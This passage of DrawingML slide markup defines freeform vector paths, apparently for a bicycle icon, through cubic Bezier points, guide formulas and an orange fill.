                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FF8C00"/>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89" name="Freeform 588"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="5710014" y="6646633"/>
                <a:ext cx="461492" cy="299405"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 11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8" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
